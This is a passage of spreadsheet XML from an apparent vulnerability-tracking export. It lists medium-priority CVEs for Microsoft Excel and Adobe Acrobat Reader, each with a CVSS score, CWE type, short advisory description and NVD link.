          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81398</t>
        </is>
      </c>
    </row>
    <row r="2296">
      <c r="A2296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81947</t>
        </is>
      </c>
      <c r="C2296" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2296" s="5" t="inlineStr"/>
      <c r="F2296" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2296" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2296" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I2296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2296" s="5" t="inlineStr"/>
      <c r="K2296" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2296" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81947</t>
        </is>
      </c>
    </row>
    <row r="2297">
      <c r="A2297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81948</t>
        </is>
      </c>
      <c r="C2297" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2297" s="5" t="inlineStr"/>
      <c r="F2297" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2297" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2297" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2297" s="5" t="inlineStr"/>
      <c r="K2297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2297" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81948</t>
        </is>
      </c>
    </row>
    <row r="2298">
      <c r="A2298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81949</t>
        </is>
      </c>
      <c r="C2298" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2298" s="5" t="inlineStr"/>
      <c r="F2298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2298" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2298" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2298" s="5" t="inlineStr"/>
      <c r="K2298" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2298" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81949</t>
        </is>
      </c>
    </row>
    <row r="2299">
      <c r="A2299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81950</t>
        </is>
      </c>
      <c r="C2299" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2299" s="5" t="inlineStr"/>
      <c r="F2299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2299" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2299" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2299" s="5" t="inlineStr"/>
      <c r="K2299" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L2299" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81950</t>
        </is>
      </c>
    </row>
    <row r="2300">
      <c r="A2300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81951</t>
        </is>
      </c>
      <c r="C2300" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2300" s="5" t="inlineStr"/>
      <c r="F2300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2300" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2300" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2300" s="5" t="inlineStr"/>
      <c r="K2300" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2300" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81951</t>
        </is>
      </c>
    </row>
    <row r="2301">
      <c r="A2301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81953</t>
        </is>
      </c>
      <c r="C2301" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2301" s="5" t="inlineStr"/>
      <c r="F2301" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2301" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2301" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2301" s="5" t="inlineStr"/>
      <c r="K2301" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2301" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81953</t>
        </is>
      </c>
    </row>
    <row r="2302">
      <c r="A2302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81954</t>
        </is>
      </c>
      <c r="C2302" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2302" s="5" t="inlineStr"/>
      <c r="F2302" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2302" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2302" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2302" s="5" t="inlineStr"/>
      <c r="K2302" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2302" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81954</t>
        </is>
      </c>
    </row>
    <row r="2303">
      <c r="A2303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81956</t>
        </is>
      </c>
      <c r="C2303" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2303" s="5" t="inlineStr"/>
      <c r="F2303" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2303" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2303" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t>
        </is>
      </c>
      <c r="I2303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2303" s="5" t="inlineStr"/>
      <c r="K2303" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2303" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81956</t>
        </is>
      </c>
    </row>
    <row r="2304">
      <c r="A2304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81957</t>
        </is>
      </c>
      <c r="C2304" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2304" s="5" t="inlineStr"/>
      <c r="F2304" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2304" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2304" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2304" s="5" t="inlineStr"/>
      <c r="K2304" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2304" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81957</t>
        </is>
      </c>
    </row>
    <row r="2305">
      <c r="A2305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81959</t>
        </is>
      </c>
      <c r="C2305" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2305" s="5" t="inlineStr"/>
      <c r="F2305" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2305" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2305" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2305" s="5" t="inlineStr"/>
      <c r="K2305" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2305" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81959</t>
        </is>
      </c>
    </row>
    <row r="2306">
      <c r="A2306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81960</t>
        </is>
      </c>
      <c r="C2306" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2306" s="5" t="inlineStr"/>
      <c r="F2306" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2306" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2306" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I2306" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2306" s="5" t="inlineStr"/>
      <c r="K2306" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2306" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81960</t>
        </is>
      </c>
    </row>
    <row r="2307">
      <c r="A2307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81973</t>
        </is>
      </c>
      <c r="C2307" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2307" s="5" t="inlineStr"/>
      <c r="F2307" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2307" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2307" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2307" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2307" s="5" t="inlineStr"/>
      <c r="K2307" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2307" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81973</t>
        </is>
      </c>
    </row>
    <row r="2308">
      <c r="A2308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81975</t>
        </is>
      </c>
      <c r="C2308" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2308" s="5" t="inlineStr"/>
      <c r="F2308" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2308" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2308" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2308" s="5" t="inlineStr"/>
      <c r="K2308" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2308" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81975</t>
        </is>
      </c>
    </row>
    <row r="2309">
      <c r="A2309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81976</t>
        </is>
      </c>
      <c r="C2309" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2309" s="5" t="inlineStr"/>
      <c r="F2309" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2309" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2309" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2309" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2309" s="5" t="inlineStr"/>
      <c r="K2309" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2309" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81976</t>
        </is>
      </c>
    </row>
    <row r="2310">
      <c r="A2310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81979</t>
        </is>
      </c>
      <c r="C2310" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2310" s="5" t="inlineStr"/>
      <c r="F2310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2310" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2310" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2310" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2310" s="5" t="inlineStr"/>
      <c r="K2310" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2310" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t>
        </is>
      </c>
    </row>
    <row r="2311">
      <c r="A2311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81980</t>
        </is>
      </c>
      <c r="C2311" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2311" s="5" t="inlineStr"/>
      <c r="F2311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2311" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2311" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2311" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2311" s="5" t="inlineStr"/>
      <c r="K2311" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2311" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t>
        </is>
      </c>
    </row>
    <row r="2312">
      <c r="A2312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81981</t>
        </is>
      </c>
      <c r="C2312" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2312" s="5" t="inlineStr"/>
      <c r="F2312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2312" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2312" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2312" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2312" s="5" t="inlineStr"/>
      <c r="K2312" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2312" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t>
        </is>
      </c>
    </row>
    <row r="2313">
      <c r="A2313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81983</t>
        </is>
      </c>
      <c r="C2313" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2313" s="5" t="inlineStr"/>
      <c r="F2313" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2313" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2313" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2313" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2313" s="5" t="inlineStr"/>
      <c r="K2313" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2313" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t>
        </is>
      </c>
    </row>
    <row r="2314">
      <c r="A2314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81985</t>
        </is>
      </c>
      <c r="C2314" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2314" s="5" t="inlineStr"/>
      <c r="F2314" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2314" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2314" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2314" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2314" s="5" t="inlineStr"/>
      <c r="K2314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2314" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t>
        </is>
      </c>
    </row>
    <row r="2315">
      <c r="A2315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81986</t>
        </is>
      </c>
      <c r="C2315" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2315" s="5" t="inlineStr"/>
      <c r="F2315" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2315" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2315" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2315" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2315" s="5" t="inlineStr"/>
      <c r="K2315" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2315" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t>
        </is>
      </c>
    </row>
    <row r="2316">
      <c r="A2316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81987</t>
        </is>
      </c>
      <c r="C2316" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2316" s="5" t="inlineStr"/>
      <c r="F2316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2316" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2316" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I2316" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2316" s="5" t="inlineStr"/>
      <c r="K2316" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2316" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
